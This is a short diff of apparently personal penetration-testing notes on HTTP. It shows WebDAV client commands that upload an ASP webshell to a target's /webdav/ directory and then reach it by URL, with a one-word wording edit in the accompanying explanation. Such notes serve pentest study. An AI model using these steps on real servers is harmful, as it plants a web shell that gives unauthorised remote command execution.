samuelngiam/Public/Penetration Testing/Files/HTTP.md

 dav:/webdav/> help
 dav:/webdav/> ls
 dav:/webdav/> put /usr/share/webshells/asp/webshell.asp
 ==> A webshell is a shell that you can access through the Web.
-It is not a reverse shell.
+It is NOT a reverse shell.

 http://<ip>/webdav/webshell.asp
 ```